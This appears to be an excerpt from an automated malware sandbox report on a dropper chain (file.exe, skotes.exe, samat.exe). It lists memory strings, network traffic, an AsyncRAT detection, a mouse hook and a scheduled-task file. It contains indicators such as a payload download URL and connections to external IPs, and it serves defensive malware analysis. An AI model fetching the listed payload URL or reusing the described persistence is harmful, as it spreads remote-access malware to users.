Source: samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527191112.000001BCCC8B7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mahler:8092/site-updates.py
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531201836.000001BCCD413000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532208300.000001BCCD415000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532440818.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530927299.000001BCCC7FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559196622.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: samat.exe, 00000008.00000003.3002201844.000001BCCBFC1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4557702763.000001BCCC500000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008392971.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://peps.python.org/pep-0205/
Source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://peps.python.org/pep-0263/
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://peps.python.org/pep-0685/
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://peps.python.org/pep-0685/Pp
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/build/).
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/importlib_metadata
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/setuptools/
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://requests.readthedocs.io
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/
Source: samat.exe, 00000008.00000003.3015789886.000001BCCC368000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008939140.000001BCCC35F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: samat.exe, 00000008.00000003.3016877538.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3014481401.000001BCCC494000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008939140.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3014733441.000001BCCC495000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
Source: samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
Source: samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
Source: samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
Source: skotes.exe, 00000006.00000003.2967423453.000000000113A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2967280151.000000000113A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://thedotmediagroup.com/samat.exe
Source: skotes.exe, 00000006.00000003.2967423453.000000000111F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://thedotmediagroup.com/samat.exe4
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563930588.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: samat.exe, 00000008.00000003.4527003356.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509758777.000001BCCC85C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC85E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wheel.readthedocs.io/
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
Source: samat.exe, 00000008.00000003.4523254156.000001BCCC351000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510813361.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4533987100.000001BCCC355000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505782582.000001BCCC34F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC895000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC339000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506796860.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503973184.000001BCCC339000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518665999.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547284877.000001BCCC355000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4569235767.00007FF8A88D4000.00000002.00000001.01000000.00000015.sdmp, samat.exe, 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.openssl.org/H
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org
Source: samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525393736.000001BCCC8BC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0427/
Source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.python.org/psf/license/)
Source: samat.exe, 00000008.00000003.4499341916.000001BCCC9FF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560683562.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532754927.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527548212.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown HTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2
Installs a global mouse hook
Source: C:\Windows\System32\dxdiag.exe Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5CD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptImportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB5CD0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects AsyncRAT Author: ditekSHen
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E6964 7_2_00007FF7E12E6964
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C89E0 7_2_00007FF7E12C89E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E5C00 7_2_00007FF7E12E5C00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E08C8 7_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C1000 7_2_00007FF7E12C1000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12DDA5C 7_2_00007FF7E12DDA5C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CA2DB 7_2_00007FF7E12CA2DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1944 7_2_00007FF7E12D1944
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D2164 7_2_00007FF7E12D2164
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D39A4 7_2_00007FF7E12D39A4
